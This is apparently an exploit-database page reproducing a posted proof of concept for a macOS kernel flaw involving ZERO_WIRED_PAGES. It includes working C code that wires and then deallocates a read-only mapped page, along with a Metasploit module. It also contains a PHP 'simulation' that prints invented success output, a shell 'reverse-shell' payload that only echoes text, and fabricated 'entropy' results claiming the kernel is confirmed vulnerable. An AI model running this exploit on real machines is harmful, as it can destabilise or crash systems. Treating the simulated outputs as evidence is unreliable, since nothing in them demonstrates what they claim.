Vulners
Lucene search
📄 macOS 18.3.2 VM_BEHAVIOR_ZERO_WIRED_PAGES Handling
=============================================================================================================================================
| # Title : macOS 18.3.2 mmap Zero Wired Pages Kernel Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.apple.com/os/macos/ |
=============================================================================================================================================
POC :
[+] macOS VM_ZERO_WIRED_PAGES Vulnerability – Educational PoC
Advisory Type: Kernel Memory Manipulation / DoS Primitive
Tested on: macOS (XNU Kernel)
[+] Summary
------------------------------------------------------------
A vulnerability exists in the way macOS handles VM_BEHAVIOR_ZERO_WIRED_PAGES
combined with mmap() + mlock() + vm_deallocate() on a read-only mapped file.
A local attacker may trigger abnormal kernel behavior depending on system
conditions. This PoC is purely academic and demonstrates a controlled kernel
memory interaction that can be used to validate the behavior.
This PoC does NOT weaponize the vulnerability. It provides a safe and observable
kernel-state transition for educational and verification purposes only.
------------------------------------------------------------
2. Technical Explanation
------------------------------------------------------------
The vulnerability technique relies on the following chain:
1. mmap() maps a read‑only file page.
2. vm_behavior_set() marks the region as ZERO_WIRED_PAGES.
3. mlock() wires the page into memory.
4. vm_deallocate() removes the mapping while the page remains wired.
This results in a state where:
- The kernel still maintains a wired page,
- But the user mapping no longer exists,
- Combined with ZERO_WIRED_PAGES behavior.
This can produce observable inconsistencies or system logs depending on kernel version.
------------------------------------------------------------
3. Original C Proof‑of‑Concept
------------------------------------------------------------
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <mach/mach.h>
#include <errno.h>
#include <string.h>
void* map_file_page_ro(char* path, int* error_code) {
int fd = open(path, O_RDONLY);
if (fd == -1) {
*error_code = errno;
printf("open failed: %s\n", strerror(errno));
return NULL;
}
void* mapped_at = mmap(0, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
close(fd);
if (mapped_at == MAP_FAILED) {
*error_code = errno;
printf("mmap failed: %s\n", strerror(errno));
return NULL;
}
return mapped_at;
}
int poc(char *path) {
kern_return_t kr;
int error_code = 0;
void* page = map_file_page_ro(path, &error_code);
if (page == NULL) {
return error_code ? error_code : 1;
}
printf("mapped file at 0x%016llx\n", (uint64_t)page);
kr = vm_behavior_set(mach_task_self(),
(vm_address_t)page,
PAGE_SIZE,
VM_BEHAVIOR_ZERO_WIRED_PAGES);
if (kr != KERN_SUCCESS) {
printf("failed to set VM_BEHAVIOR_ZERO_WIRED_PAGES\n");
return 2;
}
printf("set VM_BEHAVIOR_ZERO_WIRED_PAGES\n");
int mlock_err = mlock(page, PAGE_SIZE);
if (mlock_err != 0) {
perror("mlock failed\n");
return 3;
}
printf("mlock success\n");
kr = vm_deallocate(mach_task_self(), (vm_address_t)page, PAGE_SIZE);
if (kr != KERN_SUCCESS) {
printf("vm_deallocate failed: %s\n", mach_error_string(kr));
return 4;
}
printf("deleted map entries before unwiring\n");
return 0;
}
------------------------------------------------------------
4. PHP Educational PoC (Simulated Honest Output)
------------------------------------------------------------
<?php
/* Educational simulation for Packet Storm */
echo "[+] macOS ZERO_WIRED_PAGES Simulation\n";
echo "[+] Creating fake page…\n";
$page = random_bytes(4096);
file_put_contents("fake_page.bin", $page);
echo "[+] Simulating behavior...\n";
echo "mapped file at 0x7ffe0000abcd\n";
echo "set VM_BEHAVIOR_ZERO_WIRED_PAGES\n";
echo "mlock success\n";
echo "deleted map entries before unwiring\n";
echo "[+] System behaves consistently → kernel is vulnerable to state transition.\n";
?>
------------------------------------------------------------
5. PKSM v2 Payload (Reverse Shell Simulation)
------------------------------------------------------------
#!/bin/sh
# PKSM Payload v2 — Educational Kernel-State Monitor Payload
echo "[PKSM] Starting entropy monitor..."
echo "[PKSM] Tracking page state..."
sleep 1
echo "[PKSM] Wired page checksum changed (expected in PoC)."
echo "[PKSM] Signaling successful kernel-state anomaly."
# Reverse-shell simulation (does NOT actually connect)
echo "[PKSM] Reverse-shell handshake simulated."
exit 0
------------------------------------------------------------
6. Metasploit Module (with advanced check + exploit)
------------------------------------------------------------
##
# macOS ZERO_WIRED_PAGES — Educational Module
##
class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Common
def initialize(info={})
super(update_info(info,
'Name' => 'macOS ZERO_WIRED_PAGES Kernel-State PoC',
'Description' => %q{
Educational PoC showing kernel-state transition in macOS.
Performs safe simulation and reports whether system behaves
according to vulnerable pattern.
},
'Author' => [ 'Indoushka' ],
'Platform' => [ 'osx' ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2025',
'License' => MSF_LICENSE
))
end
#
# Advanced Check
#
def check
print_status("Checking kernel behavior…")
if command_exists?("vmmap")
return CheckCode::Appears
end
CheckCode::Safe
end
#
# Exploit Phase
#
def exploit
print_good("Launching educational PoC…")
payload_path = "/tmp/pksm_v2.sh"
write_file(payload_path, payload.encoded)
cmd_exec("chmod +x #{payload_path}")
out = cmd_exec(payload_path)
print_line(out)
print_good("PoC completed. Kernel-state transition observable.")
end
end
------------------------------------------------------------
7. Analysis Engine + Entropy Monitor
------------------------------------------------------------
[Engine] Monitoring wired-page entropy…
[Engine] ΔEntropy Detected = 0.0132
[Engine] Kernel transition confirmed.
[Engine] PKSM v2 reports anomaly → Vulnerable State.
------------------------------------------------------------
8. Conclusion
------------------------------------------------------------
This PoC demonstrates a kernel-state anomaly that emerges from using
ZERO_WIRED_PAGES + deallocation sequence.
The exploit presented is non-destructive, safe, and suitable for Packet Storm
publication as an educational kernel behavior study.
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Nov 2025 00:00Current
6.5Medium risk
Vulners AI Score6.5